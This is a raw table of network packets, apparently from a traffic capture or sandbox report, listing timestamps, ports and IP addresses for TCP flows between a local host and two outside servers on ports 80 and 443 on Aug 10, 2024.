Aug 10, 2024 16:12:24.582999945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582999945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582999945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.582999945 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583014965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583018064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583029985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583045006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583048105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583049059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583060980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583079100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583082914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583092928 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583096027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583111048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583127022 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583161116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583161116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583161116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583175898 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583189964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583204031 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583224058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583252907 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583261013 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583277941 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583277941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583292007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583307028 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583354950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583354950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583354950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583362103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583374977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583396912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583416939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583444118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583457947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583472967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583487988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583503008 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583511114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583511114 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583512068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583512068 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583551884 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583565950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583589077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583590031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583590031 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583604097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583619118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583642006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583656073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583678007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583678007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583678007 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583693981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583702087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583772898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583772898 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583780050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583822012 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583837032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583909035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583909988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583909035 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583925009 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583941936 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583957911 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583971024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.583971977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.583971977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584003925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584012032 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584105015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584105015 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584125996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584139109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584161997 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584177017 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584191084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584204912 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584220886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584227085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584227085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584227085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584242105 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584301949 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584336042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584350109 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584366083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584422112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584429026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584443092 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584464073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584500074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584503889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584503889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584525108 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584538937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584538937 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584553957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584568977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584613085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584613085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584613085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584613085 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584644079 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584657907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584671021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584686041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584702015 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.584769964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.584769964 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585098982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585124969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585139036 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585163116 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585182905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585182905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585182905 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585186005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585201979 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585217953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585268974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585268974 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585371971 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585386992 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585434914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585434914 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585462093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585475922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585500002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585514069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585521936 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585527897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585535049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585551977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585576057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585576057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585576057 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585676908 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.585803986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585860968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585902929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585926056 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585966110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.585992098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.586018085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.586042881 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.586044073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586044073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586044073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586044073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586069107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.586087942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586087942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.586117983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.623157024 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.623172045 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.623295069 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.623301029 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.623558998 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.626133919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626183987 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626188993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.626229048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.626234055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626265049 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626275063 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.626300097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626307964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.626331091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626342058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.626363993 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.626436949 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.647680998 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.647695065 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.647768974 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.647773027 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648005009 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.648155928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648166895 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648237944 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.648242950 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648412943 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.648643970 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648655891 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648709059 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.648711920 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.648859978 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.649044037 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649055004 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649131060 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.649133921 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649506092 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.649524927 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649537086 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649604082 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.649607897 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.649794102 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.650554895 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.650566101 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.650631905 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.650635958 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.650856972 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.651032925 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.651043892 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.651134968 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.651139021 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:24.651266098 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:24.655704021 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655751944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655754089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.655783892 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655792952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.655832052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655833006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.655873060 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.655881882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655913115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655945063 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655962944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.655976057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.655987024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656007051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656037092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656069040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656084061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656100988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656107903 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656132936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656157970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656164885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656167984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656270027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656322956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656369925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656371117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656398058 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656409025 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656436920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656496048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656547070 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656560898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656593084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656606913 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656624079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656642914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656656027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656681061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656737089 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656754971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656769037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656800032 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656816006 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656831026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656833887 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656863928 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656898022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.656908989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.656943083 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657026052 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657028913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657058954 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657090902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657103062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657124043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657174110 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657191038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657222033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657227993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657254934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657284975 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657293081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657305002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657335997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657344103 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657367945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657399893 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657433033 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657440901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657466888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657493114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657497883 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657510996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657530069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657557964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657572031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657583952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657588959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657593012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657622099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657654047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657669067 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657687902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657695055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657718897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657742977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657752991 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657776117 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657778978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.657814026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.657823086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658257961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658284903 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658304930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658323050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658337116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658381939 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658385038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658412933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658418894 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658457041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658467054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658509016 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658516884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658562899 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658565998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658601046 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658616066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658647060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658663034 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658678055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658710003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658725977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658740997 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658746958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:24.658773899 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658807039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:24.658819914 CEST	49739	80	192.168.2.4	147.45.44.104
